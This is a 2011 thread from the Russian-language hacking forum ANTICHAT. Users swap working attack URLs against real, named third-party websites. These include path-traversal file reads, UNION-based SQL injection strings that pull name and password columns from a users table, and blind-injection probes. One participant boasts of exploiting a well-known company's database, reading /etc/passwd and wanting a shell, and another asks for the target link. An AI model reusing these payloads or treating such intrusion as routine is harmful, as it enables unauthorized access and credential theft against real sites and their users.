ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.06.2011, 14:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
34360
Репутация:
1
|
|
Сообщение от M_script
M_script said:
Нет, это не пхп инъекция.
Можешь использовать для XSS.
Возможно, получится читать файлы на сервере. Например так:
support/button.php?image=../../../../../../../[patch]/support/button.php%00
Спасибо, добрый человек. Но что не работает. Делаю вот так support/button.php?image=../../../../../../../C:/Server/home/localhost/support/button.php%00. Получаю "Wrong parameter used or absent: image" Что не так?
XSS на этом сайтике чёртова куча, но толк от них, если там даже админки нету.
|
|
|
|
21.06.2011, 16:47
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,2,table_name+from+iNformation_sc hema.tables+--+
почему не выводит результат? ошибки тоже нет, в коде смотрел
|
|
|
21.06.2011, 16:57
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от foozzi
foozzi said:
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,2,table_name+from+iNformation_sc hema.tables+--+
почему не выводит результат? ошибки тоже нет, в коде смотрел
хекс хекс хекс
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,unhex(hex(version())),3--
|
|
|
|
21.06.2011, 17:21
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
спасибо буду знать
вот еще blind
http://www.bispublishers.nl/bookpage.php?id=142+and+ascii(lower(substring(user (),1,1)))
|
|
|
|
21.06.2011, 17:28
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
[QUOTE="foozzi"]
foozzi said:
спасибо буду знать
вот еще blind
http://www.bispublishers.nl/bookpage.php?id=142+and+ascii(lower(substring(user (),1,1)))
|
|
|
|
21.06.2011, 17:35
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Сообщение от d1v
d1v said:
с чего ты взял что она слепая? вывод в самом низу.
Код HTML:
HTML:
http://www.bispublishers.nl/bookpage.php?id=-142+union+select+1,2,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+users--
Оо фейл! я проверял у меня выводило 48 полей! да и запрос and 1=2 была пустая страница, такое в blind я читал
|
|
|
|
21.06.2011, 17:57
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от plaeer
plaeer said:
Что не так?
Во-первых, букву диска писать не надо. Во-вторых, я написал " Возможно, получится читать файлы на сервере. Например так". Все зависит от конкретного сайта, без ссылки нельзя ничего точно сказать.
|
|
|
|
21.06.2011, 18:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
10960
Репутация:
0
|
|
M_script
MySQL на дебиане 5.0, какие файлы в принципе возможно прочитать? Пробовал читать все подряд, и /etc/mysql/mysqlaccess.conf и /var/www/index.html (по моему по дефолту присутствует, не?) но ничего кроме /etc/passwd..
Почитать скрипты обращающиеся к MySQL не могу, мои запросы ведь исполняются на сервере MySQL, как я могу прочитать скрипты лежащие совсем на другом сервере?.. php include нет, ничего нет.. Кроме проклятой скули.. Нужен очень шелл.. Ну или вся БД, блайндом я ее 3 года дампить буду...
|
|
|
|
21.06.2011, 18:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от ne0k
ne0k said:
M_script
MySQL на дебиане 5.0, какие файлы в принципе возможно прочитать? Пробовал читать все подряд, и /etc/mysql/mysqlaccess.conf и /var/www/index.html (по моему по дефолту присутствует, не?) но ничего кроме /etc/passwd..
Почитать скрипты обращающиеся к MySQL не могу, мои запросы ведь исполняются на сервере MySQL, как я могу прочитать скрипты лежащие совсем на другом сервере?.. php include нет, ничего нет.. Кроме проклятой скули.. Нужен очень шелл.. Ну или вся БД, блайндом я ее 3 года дампить буду...
/thread49775.html
|
|
|
|
21.06.2011, 18:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от ne0k
ne0k said:
Expl0ited
Спасибо за ссылку, как раз что нужно.. Но... Увы, скуля была не на сайте студента 5го курса, а серьезной и немало известной компании.. Кстати мой самый крупный успех в эксплуатировании скулей.. К чему веду, мало того, что дыру они закрыли буквально с час назад, но и сервера все свои перенесли, даже тема поднята, мол двигаем все
Всем спасибо, если кому интересно что за проект был, могу скинуть ссыль в ПМ.
Кидай посмотрим )
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
